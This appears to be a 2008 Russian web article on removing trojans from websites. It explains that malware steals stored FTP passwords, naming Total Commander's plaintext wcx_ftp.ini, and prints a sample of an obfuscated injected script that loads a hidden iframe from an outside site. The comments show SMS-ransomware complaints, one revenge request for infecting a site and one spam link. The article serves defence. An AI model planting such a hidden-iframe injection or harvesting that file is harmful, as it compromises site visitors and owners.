Как избавиться от трояна на сайте

25 октября 2008 г.

В последнее время вирусы научились заражать и сайты: ведь это чрезвычайно эффективный способ распространения для них. Ниже мы изложим принципы, которых необходимо придерживаться вебмастеру, чтобы не подвергнуть опасности свой сайт.

Как вирус попадает на компьютер вебмастера?

Чаще всего обычным путем, как это делают все остальные вирусы - через ссылки, сменные носители (флешки) или по сети. Заразив сайт, вирус распространяет сам себя по компьютерам пользователей, посетивших этот сайт.

Как вирус заражает компьютеры посетителей сайта?

В основном используются уязвимости в Active-X или других компонентах браузера. Например, зайдя на сайт, вы можете увидеть сверху сообщение о том, что сайт хочет запустить Microsoft ADO.Net Services. На самом деле он хочет воспользоваться уязвимостью в этой компоненте и через нее внедриться на компьютер посетителя сайта. Если вы не будете разрешать сайтам запускать любые Active-X компоненты, которые они захотят, вы ощутимо снизите риск заражения вашего компьютера.

Как вирус попадает на сайт?

Как правило, это происходит через FTP-доступ. Если вы храните пароли в вашем FTP-клиенте, то высока вероятность, что вирус их извлечет и воспользуется ими. Вирусы имеют сведения о том, где искать сохраненные пароли, если вы пользуетесь известным FTP-клиентом. Например, если вы используете Total Commander, то в каталоге Windows находится файл wcx_ftp.ini, в котором все сохраненные пароли присутствуют в открытом виде. Факт наличия этого файла общеизвестен, и вирусы этим пользуются. Выход один - не хранить пароли в общеизвестных местах. Лучше всего их помнить, а если пароль сложен для запоминания - храните его любым нестандартным способом - вирусы не обладают искусственным интеллектом, чтобы обнаружить пароль и в этом случае.

Что делать, если вирус уже заразил мой сайт?

  • 1. Прекратить хранить пароли в FTP-клиенте - удалить их оттуда.
  • 2. Сменить пароли доступа по FTP. Это нужно сделать обязательно, т.к. многие вирусы, найдя пароль, отсылают их на свой сервер, и тот, даже если вы перестали хранить у себя пароли, все равно пользуется ими.
  • 3. Тщательно проверить и исправить все файлы на сайте. Обычно вирусы делают следующее: находят стандартные файлы (index.html, index.php и прочие индексные файлы) и дописывают в начало или конец файла свой вредоносный Javascript-код, например:
    <!-- o65 --><script type="text/javascript">document.write('u003cu0069 u0066u0072u0061u006du0065u0020u0073u0072u0063u003du0022u0068u0074u0 074u0070u003au002fu002fu0078u002du0076u0069u0063u0074u006fu0072u007 9u002eu0072u0075u002fu0066u006fu0072u0075u006du002fu0069u006eu0064 u0065u0078u002eu0070u0068u0070u0022u0020u0077u0069u0064u0074u0068u0 03du0022u0030u0022u0020u0068u0065u0069u0067u0068u0074u003du0022u003 0u0022u003eu003cu002fu0069u0066u0072u0061u006du0065u003e')</script><!---- c65 -->

Нужно просмотреть все файлы (можно отследить их по дате изменения) и очистить их от этого вредоносного кода.

Если вы проделали эти три этапа полностью и в строгой последовательности, то можете быть спокойны за свой сайт. Если все же заражение продолжается - значит, пароль от FTP хранится еще у кого-то, кто не вылечил свой компьютер от вирусов.


Комментарии


AlexAlk    (11/06/2009 19:49)

полезная инфа, думаю как раз для нашего случая, спасибо!


KoRRuS    (12/06/2009 11:39)

Да круто я так и думал что дело все в паролях спосиб автору


Качок    (24/07/2009 20:42)

У меня вирус я незнаю что делать я уже комп переустанавливал 2 раза но всеравно вклучается


Неволин Александр    (28/07/2009 12:05)

А Вы поменяли пароль на FTP?


евгений    (13/08/2009 17:32)

после посищения одного из сайтов сталвываливаться рекламный модуль, мешает работать. а на нем написано,что чтобы его удалить надо отправить смс с текстом 87654 на номер 9800. как от него избавиться?


Неволин Александр    (13/08/2009 23:49)

Евгений, у Вас просто заражен компьютер. Вирус внедрил свой модуль в Internet Explorer, который и добавляет рекламный модуль. Вам нужно просто пролечиться от вирусов, как мы описывали в статье "Как надежно лечиться от вирусов" - http//nevlabs.ru/articles/security/virusclean/.
Особое внимание обратите при работе с программой Autoruns на вкладку Internet Explorer - 90%, что именно туда прописан в запуск рекламный модуль.


Роман    (22/08/2009 13:19)

Был троян, вылечил, благодаря статье... Правда код был дописан в виде фрейма со ссылкой на чужой сайт и gzip-архив...
Спасибо автору статьи!


Анатолий    (31/08/2009 23:00)

Помогите избавится от 9800


DOS    (04/09/2009 22:07)

евгений
http://forum.3dnews.ru/showthread.php?forumid=38&threadid=99644


oleg    (01/10/2009 11:13)

помогите!немогу открыть yandex,rambler .В тех.поддерже сказали вирус


рада    (21/10/2009 23:31)

что делать если я не могу залесть в контакт даже не заходит вну где надо писать email и пороль и ещё я не знаю что мне делать


Анастасия    (13/11/2009 13:50)

как избавится от реклам появляющиеся на мониторе компьютера


степан    (15/12/2009 17:37)

как избавится от реклам появляющиеся на мониторе компьютера


Юлия    (10/01/2010 17:15)

А у меня Троян внедрился на сайт, что теперь невозможно вообще получить доступ к админке сайта


Андрей Плечун    (18/01/2010 19:09)

У меня сайт заражен вирусом, кто может помочь напишите в ICQ 592593326
Я дам денег за работу.


Даниил    (05/02/2010 21:00)

блин а как избавиться от трояна и что такое FTP у меня только главная не гузит


Даниил    (05/02/2010 21:00)

стучитесь в аську плиз 569022769


таня    (27/03/2010 12:33)

что такое FTP? у меня в контакте заселился троян! я исала сайты как удалить этот вирус! я наверно раза три проделывала эти операции!


Наивная    (23/04/2010 15:08)

А как заразить сайт человеку, который кинул меня на деньги, и просто оскорбил меня по самое не балуй, и все на ровном месте... Которая поступила мерзко по отношению ко мне, а я по своей простоте душевной даже не могла поверить в случившееся сначала....
Есть же способы как то испортить сайты? Чтобы к примеру всплывали окна с сайтами интересного содержания и прочим... Конечно ей и так потом отрыгнется, но все же...
Заранее спасибо...


Redgina    (20/04/2010 9:13)

Здравствуйте! помогите пожалуйста! на днях открыла группу, и теперь с домашнего компьютера уже 4 день как не могу зайти вконтакт. Появляется ссылка http://vkontakte.ru/index.php. А с рабочего компа все нормально.


Юлия    (01/05/2010 17:31)

как избавиться от такого 84239261 3381??


Дмитрий    (17/05/2010 18:06)

Помогите избавиться от вируса на сайте.
Заплачу. ICQ: 579721122


сергей    (19/05/2010 9:21)

как удалить модуль с текстом 9423618 на номер 3381


Лёха    (01/06/2010 20:55)

Вашоаккаунтннедоcтупенкпоупричинеьраспpостраненияеcпама илилнарушениякусловийлпользованияусайтом.mДлябразблокиpoвки анкетыпвамгнеобходимототправить cмсвсообщениелсюцифрами 9347496 наьномеp 6005.л Далеелвамипоступитокoдбактивации, котоpыйцнеобходимоаввестиуввнижнееюполе. как от него избавиться?


сергей    (02/06/2010 21:40)

как избавиться от БИЛАЙН № +79670273451 на сумму 450 рублей СПАСИБО!


Homer    (22/06/2010 16:42)

После того как снимите рекламное ПО рекомендую обязательно скачать и установить эту программу IObit Security 360 Pro она устранит вирусы от рекламного ПО и больше не допустит эту заразу к вашему ПК. В противном случае возможно вторичное появления этого банера или банера другой модификации! Скачать программу бесплатно можете пройдя по этой ссылке http://goldankaut.xxbb.ru/viewtopic.php?id=34
Помощь в снятии Рекламного ПО, Халявные Gold аккаунты на DepositFiles, LetitBit, Vip-File RapidShare и другие обменники, ключи к Антивирусам, программам, играм. http://goldankaut.xxbb.ru


Володя    (13/07/2010 22:27)

Я лазил по порно сайтам, и тут на мониторе появилась эта самая реклама...типа оторвате 390 рублей на номер билайна...всё повисло ни на что кроме как на ввод этого кода комп не реагирует...при перезагрузке снова выскакивает эта хрень, при выключении тоже, причем как только загружается комп она сразу вылазиет, теперь у меня фоновая картинка с порнухой..скажите что надо сделать чтобы от нее избавиться?


free,am    (23/07/2010 0:36)

помогите мне плз, у меня тут обновления приходят от каспера,(хотя это не каспер) и в начале следущего месяца пишет УРА 1 АПРЕЛЯ и комп вырубается, после перезагрузки выдает ошибку файла и на заходит вовще в винду приходится переустанавливать винду и поять же приходит эта фигня(((


фриман    (23/07/2010 0:42)

помогите плз, ко мне при подключении инета приходят обновления каспера(хотя это не каспер), потом в начале следущего месяца пишит УРА!!! 1 АПРЕЛЯ и комп перезагружается после загрузки пишет ошибку и не заходит вовще, только перезагружать нужно, переустановил винду таже фигня((( Помогите прошу


кристина    (06/08/2010 22:56)

как зайти на свою страницу если нет телефона и незнаешь пороль


Влад    (01/09/2010 10:52)

блин второй раз та кая фигняАктивация неограниченного доступа
Для дальнейшего доступа к сервису обхода блокировки необходима оплата.

Оплата доступа позволит вам использовать данный сервис без ограничений.
Для получения доступа отправьте SMS с текстом ANTI на номер 7375.*
В ответ Вам придет код активации, который необходимо ввести ниже.



Неверный код активации. Убедитесь, что вводите код английскими буквами

Активировать доступ
*Данный номер доступен только для российских операторов связи.
Стоимость SMS составляет 35 рублей за 30 дней.
Если Вы проживаете в Украине - отправьте сообщение ANTI на номер 2325.
Если Вы проживаете в Белоруссии - отправьте сообщение ANTI на номер 2090.
Здесь даны ответы на наиболее часто возникающие вопросы и проблемы.


mary    (25/09/2010 11:45)

просит отправить смс со словом ANTI на номер 2325....что делать?и где найти эти пароли FTP?


Алексей    (04/10/2010 14:16)

вот полезный сайтик - мне помог, и вам во многом поможет.. http://anti-trojan.nsknet.ru


Сашка))    (08/10/2010 22:34)

Мой касперский пишет что у меня контакт трояном зарожен!!


Vlad    (17/11/2010 19:32)

Для дальнейшего доступа к сервису обхода блокировки необходима оплата.

Оплата доступа позволит вам использовать данный сервис без ограничений.
Для получения доступа отправьте SMS с текстом ANTI на номер 2325.*
В ответ Вам придет код активации, который необходимо ввести ниже.


*Данный номер доступен только для российских операторов связи.
Стоимость SMS составляет 50 рублей за 30 дней.
Если Вы проживаете в Украине - отправьте сообщение ANTI на номер 7250.
Здесь даны ответы на наиболее часто возникающие вопросы и проблемы.


КоТьКа    (29/11/2010 7:29)

Для дальнейшего доступа к сервису обхода блокировки необходима оплата.

Оплата доступа позволит вам использовать данный сервис без ограничений.
Для получения доступа отправьте SMS с текстом ANTI на номер 2325.*
В ответ Вам придет код активации, который необходимо ввести ниже.

Эта ерунда меня достала! Контакт постоянно глючит! Вот что мне с этим делать!!!!???


Oksana    (29/01/2011 19:52)

У меня антивирус вроде работает.
Как узнать если ли"троян" у меня на компьютере?!


антон    (24/02/2011 23:16)

открываю свою страницу вконтакте и через секунду вылазит банер что пробный период пользования сервером окончен и нужно отправить смс с текстом anti 08785910 на номер 7375.


iq1000    (04/03/2011 16:13)

Спасибо большое за статью, а то на сайте появился вирус, все как по нотам : фтп пароли - индекс пхп - и код как в примере) Вообщем сделала бекап)


Тиюн    (11/05/2011 12:41)

<font><?$WIDGET$('25','%D1%81%D0%B0%D0%B9%D1%82%D1%83%20%D0%B1%D1%83%D0%B4%D0%B5%D1%82%20%D0%B3%D0%BE%D0%B4%20%D1%87%D0%B5%D1%80%D0%B5%D0%B7%20%25D%25%20%D0%B4%D0%BD%D0%B5%D0%B9%2C%20%25H%25%20%D1%87%D0%B0%D1%81%D0%BE%D0%B2%2C%20%25M%25%20%D0%BC%D0%B8%D0%BD%D1%83%D1%82%2C%20%25S%25%20%D1%81%D0%B5%D0%BA%D1%83%D0%BD%D0%B4.|2011|2|27|10|05|31')?>

А может быть ли это вирусоносителем??


кристинка    (20/05/2011 18:06)

У меня возникла проблема!
У меня не открывается контакт.
Пишет что то вроде :
Соединение закрыто удалённым сервером

Вы попытались получить доступ к адресу http://vkontakte.ru/id********, который сейчас недоступен. Убедитесь, что веб-адрес (URL) введен правильно, и попытайтесь перезагрузить страницу.

жесть((че делать ,даж незнаю


Написать комментарий

Ваше имя:


Комментарий:

Email:

Необязательно. Вы можете указать email, если хотите получать на него ответы в этой теме. Адрес опубликован не будет.

Защита от роботов: какой сегодня год?